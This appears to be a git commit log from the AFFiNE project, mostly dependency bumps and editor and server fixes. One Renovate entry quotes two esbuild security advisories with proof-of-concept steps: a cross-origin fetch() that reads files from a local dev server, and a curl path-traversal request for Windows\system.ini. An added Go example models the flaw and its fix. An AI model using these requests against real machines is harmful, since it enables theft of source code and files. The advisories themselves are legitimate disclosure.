### esbuild enables any website to send any requests to the development server and read the response

[GHSA-67mh-4wv8-2f99](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99)

<details>
<summary>More information</summary>

#### Details
##### Summary

esbuild allows any website to send any request to the development
server and read the response due to default CORS settings.

##### Details

esbuild sets the `Access-Control-Allow-Origin: *` header on all requests,
including the SSE connection, which allows any website to send any
request to the development server and read the response.


https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L121

https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L363

**Attack scenario**:

1. The attacker serves a malicious web page
(`http://malicious.example.com`).
1. The user accesses the malicious web page.
1. The attacker sends a `fetch('http://127.0.0.1:8000/main.js')` request
by JS in that malicious web page. This request is normally blocked by
same-origin policy, but that's not the case for the reasons above.
1. The attacker gets the content of `http://127.0.0.1:8000/main.js`.

In this scenario, I assumed that the attacker knows the URL of the
bundle output file name. But the attacker can also get that information
by

- Fetching `/index.html`: normally you have a script tag here
- Fetching `/assets`: it's common to have an `assets` directory when you
have JS files and CSS files in a different directory and the directory
listing feature tells the attacker the list of files
- Connecting `/esbuild` SSE endpoint: the SSE endpoint sends the URL
path of the changed files when the file is changed (`new
EventSource('/esbuild').addEventListener('change', e =>
console.log(e.type, e.data))`)
- Fetching URLs in the known file: once the attacker knows one file, the
attacker can know the URLs imported from that file

The scenario above fetches the compiled content, but if the victim has
the source map option enabled, the attacker can also get the
non-compiled content by fetching the source map file.

##### PoC

1. Download
[reproduction.zip](https://redirect.github.com/user-attachments/files/18561484/reproduction.zip)
2. Extract it and move to that directory
1. Run `npm i`
1. Run `npm run watch`
1. Run `fetch('http://127.0.0.1:8000/app.js').then(r =>
r.text()).then(content => console.log(content))` in a different
website's dev tools.


![image](https://redirect.github.com/user-attachments/assets/08fc2e4d-e1ec-44ca-b0ea-78a73c3c40e9)

##### Impact

Users using the serve feature may get the source code stolen by
malicious websites.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N`

#### References
- [https://github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99)
- [https://github.com/evanw/esbuild/commit/de85afd65edec9ebc44a11e245fd9e9a2e99760d](https://redirect.github.com/evanw/esbuild/commit/de85afd65edec9ebc44a11e245fd9e9a2e99760d)
- [https://github.com/advisories/GHSA-67mh-4wv8-2f99](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### esbuild allows arbitrary file read when running the development server on Windows

[GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr)

<details>
<summary>More information</summary>

#### Details
##### Summary

The development server contains a path traversal vulnerability on
Windows when serving files from `servedir`.

Due to the use of `path.Clean()` (which only normalizes forward-slash
`/` separators) instead of a Windows-aware path normalization function,
it is possible to craft requests using backslashes (`\`) that bypass the
intended directory containment logic. An attacker can escape the
configured `servedir` root and access arbitrary files on the filesystem.
This issue affects Windows environments only.

##### Details

The request path is sanitized using:
```go
// https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L165
queryPath := path.Clean(req.URL.Path)[1:]
```

However:
- `path.Clean()` is POSIX-style and only understands `/` (docs:
`https://pkg.go.dev/path#Clean`)
- On Windows, `\` is a valid path separator
- `path.Clean()` does not treat `\` as a separator

Later, the server constructs the absolute path:
```go
// https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L221
absPath := h.fs.Join(h.servedir, queryPath)
```

If `queryPath` contains sequences such as:
```
..\..\..\..\..\..\..\Windows\system.ini
```

`path.Clean()` will not normalize them, but the Windows filesystem will
interpret `\` as directory separators when resolving `absPath`.
Because the implementation does not verify that the final resolved path
remains within `servedir`, it allows directory traversal outside the
intended root directory.

##### Vulnerable Code

```go
// https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L165
	queryPath := path.Clean(req.URL.Path)[1:]
	....
	// Check for a file in the "servedir" directory
	if h.servedir != "" && kind != fs.FileEntry {
		absPath := h.fs.Join(h.servedir, queryPath)
		if absDir := h.fs.Dir(absPath); absDir != absPath {
			if entries, err, _ := h.fs.ReadDirectory(absDir); err == nil {
				if entry, _ := entries.Get(h.fs.Base(absPath)); entry != nil && entry.Kind(h.fs) == fs.FileEntry {
	....				
```

##### Steps to reproduce

```
npm install --save-exact --save-dev esbuild

echo "console.log(1)" > app.js

.\node_modules\.bin\esbuild --version
0.27.3

.\node_modules\.bin\esbuild app.js --bundle --outdir=www --servedir=www --watch

curl -i --path-as-is "http://localhost:8000/..\..\..\..\..\..\..\Windows\system.ini"
<content of Windows\system.ini>
```

##### Impact

- Arbitrary file read on Windows
- Exposure of sensitive files

#### Severity
- CVSS Score: 2.5 / 10 (Low)
- Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N`

#### References
- [https://github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr)
- [https://github.com/evanw/esbuild/releases/tag/v0.28.1](https://redirect.github.com/evanw/esbuild/releases/tag/v0.28.1)
- [https://github.com/advisories/GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>evanw/esbuild (esbuild)</summary>

###
[`v0.28.1`](https://redirect.github.com/evanw/esbuild/blob/HEAD/CHANGELOG.md#0281)

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.28.0...v0.28.1)

- Disallow `\\` in local development server HTTP requests
([GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr))

This release fixes a security issue where HTTP requests to esbuild's
local development server could traverse outside of the serve directory
on Windows using a `\\` backslash character. It happened due to the use
of Go's `path.Clean()` function, which only handles Unix-style `/`
characters. HTTP requests with paths containing `\\` are no longer
allowed.

Thanks to [@dellalibera](https://redirect.github.com/dellalibera)
for reporting this issue.

- Add integrity checks to the Deno API
([GHSA-gv7w-rqvm-qjhr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-gv7w-rqvm-qjhr))

The previous release of esbuild added integrity checks to esbuild's npm
install script. This release also adds integrity checks to esbuild's
Deno install script. Now esbuild's Deno API will also fail with an error
if the downloaded esbuild binary contains something other than the
expected content.

Note that esbuild's Deno API installs from `registry.npmjs.org` by
default, but allows the `NPM_CONFIG_REGISTRY` environment variable to
override this with a custom package registry. This change means that the
esbuild executable served by `NPM_CONFIG_REGISTRY` must now match the
expected content.

Thanks to [@sondt99](https://redirect.github.com/sondt99) for
reporting this issue.

- Avoid inlining `using` and `await using` declarations
([#4482](https://redirect.github.com/evanw/esbuild/issues/4482))

Previously esbuild's minifier sometimes incorrectly inlined `using` and
`await using` declarations into subsequent uses of that declaration,
which then fails to dispose of the resource correctly. This bug happened
because inlining was done for `let` and `const` declarations by avoiding
doing it for `var` declarations, which no longer worked when more
declaration types were added. Here's an example:

  ```js
  // Original code
  {
    using x = new Resource()
    x.activate()
  }

  // Old output (with --minify)
  new Resource().activate();

  // New output (with --minify)
  {using e=new Resource;e.activate()}
  ```

- Fix module evaluation when an error is thrown
([#4461](https://redirect.github.com/evanw/esbuild/issues/4461),
[#4467](https://redirect.github.com/evanw/esbuild/pull/4467))

If an error is thrown during module evaluation, esbuild previously
didn't preserve the state of the module for subsequent module
references. This was observable if `import()` or `require()` is used to
import a module multiple times. The thrown error is supposed to be
thrown by every call to `import()` or `require()`, not just the first.
With this release, esbuild will now throw the same error every time you
call `import()` or `require()` on a module that throws during its
evaluation.

- Fix some edge cases around the `new` operator
([#4477](https://redirect.github.com/evanw/esbuild/issues/4477))

Previously esbuild incorrectly printed certain edge cases involving
complex expressions inside the target of a `new` expression
(specifically an optional chain and/or a tagged template literal). The
generated code for the `new` target was not correctly wrapped with
parentheses, and either contained a syntax error or had different
semantics. These edge cases have been fixed so that they now correctly
wrap the `new` target in parentheses. Here is an example of some
affected code:

  ```js
  // Original code
  new (foo()`bar`)()
  new (foo()?.bar)()

  // Old output
  new foo()`bar`();
  new (foo())?.bar();

  // New output
  new (foo())`bar`();
  new (foo()?.bar)();
  ```

- Fix renaming of nested `var` declarations
([#4471](https://redirect.github.com/evanw/esbuild/issues/4471))

This release fixes a bug where `var` declarations in nested scopes that
are hoisted up to module scope were not correctly being renamed during
bundling. That could previously lead to name collisions when
minification was disabled, which could potentially cause a behavior
change. The bug has been fixed so that these hoisted declarations are
now considered to be module-level symbols during the name collision
avoidance pass.

- Emit `var` instead of `const` for certain TypeScript-only constructs
for ES5
([#4448](https://redirect.github.com/evanw/esbuild/issues/4448))

While esbuild doesn't generally support converting `const` to `var` for
ES5 due to nested scoping rules (which is currently a build-time error),
esbuild previously incorrectly converted TypeScript-only `import`
assignment constructs into a `const` declaration even when targeting
ES5. With this release, esbuild will now use `var` for this case
instead:

  ```js
  // Original code
  import x = require('y')

  // Old output (with --target=es5)
  const x = require("y");

  // New output (with --target=es5)
  var x = require("y");
  ```

### `v0.28.0`

[Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.7...v0.28.0)

### `v0.27.7`

[Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.5...v0.27.7)

### `v0.27.5`

[Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.4...v0.27.5)

### `v0.27.4`

[Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.3...v0.27.4)

### `v0.27.3`

[Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.2...v0.27.3)

### `v0.27.2`

[Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.1...v0.27.2)

### `v0.27.1`

[Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.0...v0.27.1)

### `v0.27.0`

[Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.26.0...v0.27.0)

### `v0.26.0`

[Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.25.12...v0.26.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-18 17:41:44 +08:00
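
The containment failure described in the esbuild advisory GHSA-g7r4-m6w7-qqqr quoted in the commit message above, as an added Go example that is not esbuild's code. `resolveWindows` is a simplified stand-in for Windows path resolution so the behaviour is visible on any OS; the function names, the `C:\proj\www` root and the sample request paths are constructed for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"path"
	"strings"
)

var (
	errBackslash = errors.New("request path contains a backslash")
	errEscape    = errors.New("resolved path escapes servedir")
)

// legacyQueryPath mirrors the sanitization quoted in the advisory.
// path.Clean only treats '/' as a separator, so '\' passes through untouched.
func legacyQueryPath(urlPath string) string {
	return path.Clean(urlPath)[1:]
}

// resolveWindows models how a Windows filesystem resolves root joined with rel:
// both '/' and '\' separate components and ".." drops the previous component,
// but never the volume. Simplified model: no UNC paths, symlinks or streams.
func resolveWindows(root, rel string) string {
	isSep := func(r rune) bool { return r == '/' || r == '\\' }
	parts := strings.FieldsFunc(root+`\`+rel, isSep)
	if len(parts) == 0 {
		return ""
	}
	stack := []string{parts[0]} // volume, e.g. "C:"
	for _, p := range parts[1:] {
		switch p {
		case ".":
			// current directory: nothing to do
		case "..":
			if len(stack) > 1 {
				stack = stack[:len(stack)-1]
			}
		default:
			stack = append(stack, p)
		}
	}
	return strings.Join(stack, `\`)
}

// isContained reports whether resolved is root itself or lies below it.
// The trailing separator stops a sibling such as "www-backup" from matching,
// and the comparison is case-insensitive like Windows file names.
func isContained(root, resolved string) bool {
	r := strings.ToLower(resolveWindows(root, ""))
	p := strings.ToLower(resolved)
	return p == r || strings.HasPrefix(p, r+`\`)
}

// safeResolve applies the two checks the advisory text points at: reject any
// backslash in the request path (what the v0.28.1 release note describes), then
// verify the final resolved path is still inside root as defense in depth.
func safeResolve(root, urlPath string) (string, error) {
	if strings.ContainsRune(urlPath, '\\') {
		return "", errBackslash
	}
	abs := resolveWindows(root, legacyQueryPath(urlPath))
	if !isContained(root, abs) {
		return "", errEscape
	}
	return abs, nil
}

func main() {
	root := `C:\proj\www` // constructed servedir
	requests := []string{ // constructed request paths
		"/app.js",
		"/../../secret.txt",
		`/..\..\..\Windows\system.ini`,
	}
	for _, u := range requests {
		legacy := resolveWindows(root, legacyQueryPath(u))
		_, err := safeResolve(root, u)
		fmt.Printf("%q\n  legacy resolves to %q (contained=%v)\n  hardened error: %v\n",
			u, legacy, isContained(root, legacy), err)
	}
}
```

Forward-slash traversal is already neutralized by `path.Clean`; only the backslash form reaches the filesystem with its `..` components intact.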
DarkSky 154d9e975d fix: deps & config (#15126) 2026-06-18 14:41:48 +08:00
renovate[bot] 24e07f73bb chore: bump up capacitor-plugin-app-tracking-transparency version to v3 (#15079)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [capacitor-plugin-app-tracking-transparency](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency) | [`^2.0.5` → `^3.0.0`](https://renovatebot.com/diffs/npm/capacitor-plugin-app-tracking-transparency/2.0.5/3.0.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/capacitor-plugin-app-tracking-transparency/3.0.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/capacitor-plugin-app-tracking-transparency/2.0.5/3.0.0?slim=true) |

---

### Release Notes

<details>
<summary>mahnuh/capacitor-plugin-app-tracking-transparency
(capacitor-plugin-app-tracking-transparency)</summary>

###
[`v3.0.0`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/releases/tag/v3.0.0)

[Compare
Source](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/compare/v2.0.5...v3.0.0)

- Add support for Swift Package Manager
([#29](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/issues/29))
[`40051d6`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/commit/40051d6)
- Update README.md
[`d8c4d27`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/commit/d8c4d27)

***

</details>

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-06-18 13:00:42 +08:00
DarkSky d500e472f0 chore: bump deps (#15124) 2026-06-18 12:55:18 +08:00
DarkSky 13d9fe506e feat(native): cleanup vendored deps (#15119)
#### PR Dependency Tree


* **PR #15119** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Breaking Changes**
* Removed major Rust public APIs related to document/CRDT encoding,
synchronization, and document loading from the affected packages.
* **Chores**
* Migrated internal dependency usage to published crates and trimmed the
Rust workspace/feature surface.
* **CI/CD**
* Simplified the Rust CI pipeline by removing advanced testing jobs and
updating job dependencies.
* **Dev/Test/Bench**
* Removed associated benchmark and fuzzing artifacts and related
fixture/test utilities.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-18 02:55:30 +08:00
DarkSky 1256d66938 fix(server): sync permission check (#15123)
fix #15121



#### PR Dependency Tree


* **PR #15123** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Security Improvements**
* Enforced document-level `Doc.Read`/`Doc.Update` checks for key sync
websocket operations, including filtering workspace doc timestamp
results to only readable documents.
* Improved remote permission handling: once a remote denies access,
syncing stops for the affected document and retry behavior is
suppressed.
* **Improvements**
* `delete-doc` now relies on server acknowledgment and returns an
explicit `{ success: true }`.
* Websocket acknowledgment errors are now normalized for consistent
error details.
* **Tests**
* Expanded permission-denied and websocket error-handling coverage,
including timestamp filtering and no-retry behavior after permission
denial.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-18 02:43:25 +08:00
DarkSky da7781a751 feat(mobile): improve android edgeless & ci (#15118)
#### PR Dependency Tree


* **PR #15118** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Improved mobile CI workflow with change-aware Android/iOS build jobs
and updated completion dependencies so tests wait for the relevant
mobile builds.
* **Performance / App Behavior**
* Enhanced Android WebView behavior: improved viewport/WebView tuning,
disabled zoom and scrollbars, and made mixed-content allowance
environment-aware (debug vs non-debug).
* Adjusted Android cleartext traffic handling based on build/debug
settings and Capacitor server URL configuration.
* **Tests**
* Strengthened Electron BYOK storage tests with per-test temporary
directories, mock control, and added coverage for when secure storage is
unavailable.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-17 02:08:15 +08:00
keepClamDown a77d89bb1a fix(editor): edgeless can't slider with finger (#15091)
fix bug edgeless can't slider with finger 

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Added mobile immersive edgeless mode with dynamic chrome auto-hide and
tap-gesture controls.
  * Added a mobile zoom ruler UI for edgeless.
* **Bug Fixes**
* Improved iOS rendering/zoom by applying low-zoom survival behavior,
gesture-aware refresh deferral, and effective-DPR canvas scaling.
* Fixed iOS webview zoom/bounce and process-termination reload behavior.
  * Improved placeholder styling with theme-aware colors.
* **Chores**
  * Updated local ignore rules and iOS app build/version configuration.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <darksky2048@gmail.com>
2026-06-16 21:19:31 +08:00
YashTomar2201 c51bdb74de fix: resolve renovate configuration validation error (#15104)
Fixes #15101 

### What this PR does
Resolves a Renovate configuration error where the bot stopped processing
PRs due to invalid settings in `.github/renovate.json`.

### The Bug
The 4th rule in the `packageRules` array was combining the `*` wildcard
with negated regex patterns (`!/^@blocksuite//`, `!/oxlint/`) inside the
`matchPackageNames` field, which violates Renovate's current validation
schema.

### The Fix
* Kept the `*` wildcard isolated inside `matchPackageNames`.
* Extracted the negative lookaheads and moved them to their dedicated
`excludePackagePatterns` array.
* Cleaned up the regex formatting for the exclusion patterns.

*Note: This configuration was successfully verified locally using `npx
renovate-config-validator`.*

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Refined dependency update configuration: broadened the non-major npm
package rule to apply to all packages while explicitly excluding
selected packages from automated updates.
* Adjusted exclusion patterns to replace prior negation-based logic with
clearer exclusion entries for specific packages.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-15 17:26:10 +08:00
Juan Abimael Santos Castillo ac3c93ccfa fix(editor): render strikethrough on links (#15109)
**Issue**

Strikethrough on a link doesn't render. The toolbar button highlights
but no line
appears (#15106).

**Solution**

affine-link hardcoded text-decoration: none in the override it passes to
affineTextStyles, which clobbered the decoration computed from
strike/underline.
Removing it fixes the render; plain links still show no underline
because
affineTextStyles returns none by default.

**Result**

Strikethrough and underline render on links again. Added an e2e test: a
plain link
stays undecorated, a struck link renders line-through, red before the
fix and green
after.

fix #15106

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Fixed link text-decoration styling to properly support strikethrough
and other text formatting when applied to links.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-14 19:34:36 +08:00
DarkSky 6a2b73e76f feat(editor): improve database & table behavior (#15100)
fix #14982
fix #15028
fix #15099

#### PR Dependency Tree


* **PR #15100** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Prevented Enter handling during IME composition to avoid unintended
input.
* Avoided overwriting external native selections when interacting with
tables.
* Improved validation of inline text selection ranges for more reliable
behavior.

* **Enhancements**
* Scoped and refined text-selection styling and editability within
tables and cells.
  * Added managed sorting for Kanban views to control card ordering.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-11 13:50:23 +08:00
DarkSky 07a08e6d4d fix(editor): import & save logic (#15098)
fix #15080
fix #15085
fix #15031
fix #15094


#### PR Dependency Tree


* **PR #15098** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
  * Improved code-block paste behavior for plain-text insertion
  * Fixed block selection ordering to reflect document model
  * Made table cell formatting resilient to conversion errors
  * Ensured user feature list is consistently returned as an array

* **Refactor**
  * Streamlined authentication session fetch and profile enrichment flow

* **Tests**
  * Added tests for markdown blockquote list preservation
  * Added authentication session validation tests
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-10 22:43:31 +08:00
Talha Mujahid 6faebcabd3 fix(editor): prevent backspace in icon picker search from deleting editor content (#15089)
## Problem
When the callout block's icon picker is open and the user types in the
search input, pressing backspace deletes content in the main editor
instead of the search text.

## Root Cause
The callout icon picker is mounted via `createPopup` inside
`editor-host`. `PageKeyboardManager` registers a global `Backspace`
handler on the editor host (`keyboard-manager.ts`) with `{ global: true
}`, which fires on every backspace keydown regardless of what element is
focused. Without `stopPropagation`, the backspace event from the search
input bubbles up through the DOM and triggers block deletion.

Other keys are unaffected because the editor handles character input
through `contenteditable` focus, those handlers only act when a
contenteditable node is active.

## Fix
Add `onKeyDown` with `e.stopPropagation()` to the search inputs in both
`EmojiPicker` and `AffineIconPicker`. This matches the existing pattern
already used by `MenuComponent` (`menu-renderer.ts:107`) and all other
interactive components (`date-picker`, `inline-edit`, `prompt-modal`).

## Why not affected elsewhere
`DocIconPicker` uses the same pickers but wraps them in a Radix UI
`Menu` with `modal: true`, which portals outside `editor-host` — so
backspace events never reach the editor's global handler there.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved keyboard event handling in search inputs for icon and emoji
pickers

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-10 16:13:04 +08:00
DarkSky d10dd12663 fix(core): transport may not available (#15087)
fix #15086


#### PR Dependency Tree


* **PR #15087** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Console logging is now disabled in production builds to reduce
unnecessary log output, while remaining enabled in development for
debugging purposes.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-06 18:32:54 +08:00
renovate[bot] edc87e38df chore: bump up RevenueCat/purchases-ios-spm version to from: "5.76.0" (#15077)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm) | minor | `from: "5.75.0"` → `from: "5.76.0"` |

---

### Release Notes

<details>
<summary>RevenueCat/purchases-ios-spm
(RevenueCat/purchases-ios-spm)</summary>

###
[`v5.76.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.75.0...5.76.0)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.75.0...5.76.0)

</details>

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-04 16:39:11 +08:00
DarkSky 65c3271beb feat(server): clean up dirty data from legacy version (#15078)
#### PR Dependency Tree


* **PR #15078** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
  * Persist and replay incoming payment webhooks for reliability.
* Track provider-level subscriptions, payment events, and per-target
trial usage across providers.
  * Nightly replay job to reprocess stuck payment events.
* Shadow backfill mode and emit-suppression options to control
projection/backfill side effects.
  * Subscriptions now derived from entitlements + provider facts.

* **Bug Fixes**
* Improved error propagation, retry tracking, and safer owner-grant
projection handling.

* **Tests**
* Added webhook failure/replay, provider integration, entitlement
projection, and trial/checkout tests.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-04 16:38:44 +08:00
renovate[bot] 489702eb66 chore: bump up actions/github-script action to v9 (#15074)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [actions/github-script](https://redirect.github.com/actions/github-script) | action | major | `v8` → `v9` |

---

### Release Notes

<details>
<summary>actions/github-script (actions/github-script)</summary>

###
[`v9.0.0`](https://redirect.github.com/actions/github-script/releases/tag/v9.0.0)

[Compare
Source](https://redirect.github.com/actions/github-script/compare/v9.0.0...v9.0.0)

**New features:**

- **`getOctokit` factory function** — Available directly in the script
context. Create additional authenticated Octokit clients with different
tokens for multi-token workflows, GitHub App tokens, and cross-org
access. See [Creating additional clients with
`getOctokit`](https://redirect.github.com/actions/github-script#creating-additional-clients-with-getoctokit)
for details and examples.
- **Orchestration ID in user-agent** — The `ACTIONS_ORCHESTRATION_ID`
environment variable is automatically appended to the user-agent string
for request tracing.

**Breaking changes:**

- **`require('@actions/github')` no longer works in scripts.**
The upgrade to `@actions/github` v9 (ESM-only) means
`require('@actions/github')` will fail at runtime. If you
previously used patterns like `const { getOctokit } =
require('@actions/github')` to create secondary clients, use the
new injected `getOctokit` function instead — it's available directly in
the script context with no imports needed.
- `getOctokit` is now an injected function parameter. Scripts that
declare `const getOctokit = ...` or `let getOctokit = ...` will get a
`SyntaxError` because JavaScript does not allow `const`/`let`
redeclaration of function parameters. Use the injected `getOctokit`
directly, or use `var getOctokit = ...` if you need to redeclare it.
- If your script accesses other `@actions/github` internals beyond the
standard `github`/`octokit` client, you may need to update those
references for v9 compatibility.

##### What's Changed

- Add ACTIONS\_ORCHESTRATION\_ID to user-agent string by
[@Copilot](https://redirect.github.com/Copilot) in
[#695](https://redirect.github.com/actions/github-script/pull/695)
- ci: use deployment: false for integration test environments by
[@salmanmkc](https://redirect.github.com/salmanmkc) in
[#712](https://redirect.github.com/actions/github-script/pull/712)
- feat!: add getOctokit to script context, upgrade
[@actions/github](https://redirect.github.com/actions/github) v9,
[@octokit/core](https://redirect.github.com/octokit/core) v7, and
related packages by
[@salmanmkc](https://redirect.github.com/salmanmkc) in
[#700](https://redirect.github.com/actions/github-script/pull/700)

##### New Contributors

- [@Copilot](https://redirect.github.com/Copilot) made their
first contribution in
[#695](https://redirect.github.com/actions/github-script/pull/695)
**Full Changelog**:
<https://github.com/actions/github-script/compare/v8.0.0...v9.0.0>

###
[`v9`](https://redirect.github.com/actions/github-script/compare/v8...v9)

[Compare
Source](https://redirect.github.com/actions/github-script/compare/v8.0.0...v9.0.0)

</details>

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-04 07:44:53 +08:00
renovate[bot] e3349b458c chore: bump up apple-actions/import-codesign-certs action to v7 (#15075)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [apple-actions/import-codesign-certs](https://redirect.github.com/apple-actions/import-codesign-certs) | action | major | `v6` → `v7` |

---

### Release Notes

<details>
<summary>apple-actions/import-codesign-certs
(apple-actions/import-codesign-certs)</summary>

###
[`v7.0.0`](https://redirect.github.com/Apple-Actions/import-codesign-certs/releases/tag/v7.0.0)

[Compare
Source](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v7.0.0...v7.0.0)

#### What's Changed

- Switch from `ncc` to `esbuild`
- Bump flatted from 3.4.1 to 3.4.2 by
[@dependabot](https://redirect.github.com/dependabot)\[bot] in
[Apple-Actions#166](https://redirect.github.com/Apple-Actions/import-codesign-certs/pull/166)
- Bump actions/setup-node from 6.2.0 to 6.3.0 by
[@dependabot](https://redirect.github.com/dependabot)\[bot] in
[Apple-Actions#167](https://redirect.github.com/Apple-Actions/import-codesign-certs/pull/167)
- Bump picomatch from 2.3.1 to 2.3.2 by
[@dependabot](https://redirect.github.com/dependabot)\[bot] in
[Apple-Actions#168](https://redirect.github.com/Apple-Actions/import-codesign-certs/pull/168)
- Bump knip from 5.78.0 to 6.2.0 by
[@dependabot](https://redirect.github.com/dependabot)\[bot] in
[Apple-Actions#173](https://redirect.github.com/Apple-Actions/import-codesign-certs/pull/173)

**Full Changelog**:
<https://github.com/Apple-Actions/import-codesign-certs/compare/v6.1.0...v7.0.0>

### [`v7`](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v6.1.0...v7.0.0)

[Compare
Source](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v6.1.0...v7.0.0)

